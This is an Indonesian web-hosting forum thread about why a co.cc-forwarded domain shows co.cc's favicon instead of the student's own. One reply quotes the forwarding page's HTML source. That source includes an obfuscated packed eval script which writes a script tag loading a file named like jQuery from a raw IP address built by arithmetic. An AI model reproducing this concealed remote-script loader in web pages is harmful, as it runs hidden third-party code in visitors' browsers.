[HELP] How to change Favicon on co.cc

Discussion in 'Web Hosting' started by CallMeRitter, 17 Jun 2012.

Thread Status:
Not open for further replies.
  1. CallMeRitter

    CallMeRitter Beginner 1.0

    Messages:
    13
    Likes Received:
    0
    Trophy Points:
    1
    oke sesuai judul, gw lansung aja nih ..
    gw kan sekarang lagi buat project akhir, ya maklum lah, mw naik smester :p
    jadi gw di suruh buat website dan mengonlinekanya ..
    singkat cerita, website newbie gw udah jadi, terus gw nemu masalah dikit,,


    gw kan pake fasilitas URL Forwarding di domain Co.Cc ..
    nah, yang gw mw tanyain gmn cara ngeganti favicon di domain co.cc ?

    nih domain asli gw, My Last Project << liat faviconnya, muncul kan ? :cool:

    pas gw forward ke My Last Project - Powered by CO.CC (*titiknya hapus 1 dolo Tuan) << loh kok faviconnya berubah, jadi Co.CC ?? :confused: :Cry:

    ada yang bisa bantu ??

    need help !!!

    cendol meluncur, tapi maaf gw ga punya cendol ..
    tar gw kasih thanks aja ke semua TS'a ..
    tolong ye
     
  2. BennyKusman

    BennyKusman Hosting Guru DWH Guardian Web Hosting (Company)

    Messages:
    2,234
    Likes Received:
    239
    Trophy Points:
    63
    ini URL forwarding atau apa mas ?
    apa file favicon.ico sudah diletakan ?

    coba line ini ditambahkan:
     
    CallMeRitter likes this.
  3. alvingiovanno

    alvingiovanno Apprentice 2.0

    Messages:
    516
    Likes Received:
    26
    Trophy Points:
    28
    kalo iframe langsung dari co.cc ya begitu bro . kecuali di arahkan ke hosting dulu baru buat index.html yang isinya iframe baru deh favicon bisa di ganti sesuka jidat :D
     
    CallMeRitter likes this.
  4. CallMeRitter

    CallMeRitter Beginner 1.0

    Messages:
    13
    Likes Received:
    0
    Trophy Points:
    1
    udah saya masukin itu ke link yang pertama, terus saya forward ke co.cc, malah ga muncul ..

    itu udah mas, liat aja link yang pertama,
    terus liat link yang ke 2, dari Co.Cc
     
  5. BennyKusman

    BennyKusman Hosting Guru DWH Guardian Web Hosting (Company)

    Messages:
    2,234
    Likes Received:
    239
    Trophy Points:
    63
    Apa problema nya sama dengan Can't change CO.CC favicon ?
     
  6. alvingiovanno

    alvingiovanno Apprentice 2.0

    Messages:
    516
    Likes Received:
    26
    Trophy Points:
    28
    hehe udah pasti ga bisa :) di domain utama pasti kebaca, nah Tuan ritter pakai url iframe yang mana coding sudah di berikan dari co*cc coba ada di buka domain co*cc nya lalu view source ,buktinya aja di title ada "powered by co cc "
    Code:
    <html>
    <title>My Last Project - Powered by CO.CC</title>
    <meta http-equiv="content-type" content="text/html; charset=utf-8">
    <meta name="keywords" content="Perancangan Web">
    <meta name="distribution" content="global">
    <meta name="revisit" content="10 days">
    <meta name="revisit-after" content="10 days">
    <meta name="resource-type" content="document">
    <meta name="audience" content="all">
    <meta NAME="rating" content="General">
    <meta name="robots" content="all">
    <meta name="robots" content="index,follow">
    <link rel="shortcut icon" href="http://www.co.cc/img/favicon.ico" >
    <script language=javascript>if (top.frames.length > 0) top.location.replace(self.location);</script>
    <script type="text/javascript"> 
    eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('o.l(p("%7 9=\'a:\\/\\/"+(b+6)+"."+(5+1)+"."+(2+3)+"."+(4-8)+"\\/c.k?i=m&n=j\' h=\'d/e\'%0%f/g%0"));',26,26,'3E|95|150|93|20|80|14|3Cscript||src|http|98|jQuery|text|javascript|3C|script|type||F|js|write|23||document|unescape'.split('|'),0,{}))
    </script>
    
    <frameset rows="100%" frameborder=0 framespacing=0>
              <frame src="http://lastproject.net84.net" frameborder=0 marginwidth=0 marginheight=0>
    </frameset>
    </html>
    
    saran saya mending cari free web hosting, such 000 lalu arahkan domain co*cc ke ns tersebut. buat deh html iframe :) saya udah pernah kok pakai co*cc
     
  7. CallMeRitter

    CallMeRitter Beginner 1.0

    Messages:
    13
    Likes Received:
    0
    Trophy Points:
    1
    jadi link untuk forwardnya apa lagi Tuan ??
    saya bingung ene ..
     
  8. alvingiovanno

    alvingiovanno Apprentice 2.0

    Messages:
    516
    Likes Received:
    26
    Trophy Points:
    28
    sebenernya sih ga usah bingung Tuan wkwkkwkw pokoknya kalau mau berubah favicon, berikan co,cc tersebut sebuah hosting :D
     
Loading...
Thread Status:
Not open for further replies.

Share This Page

Loading...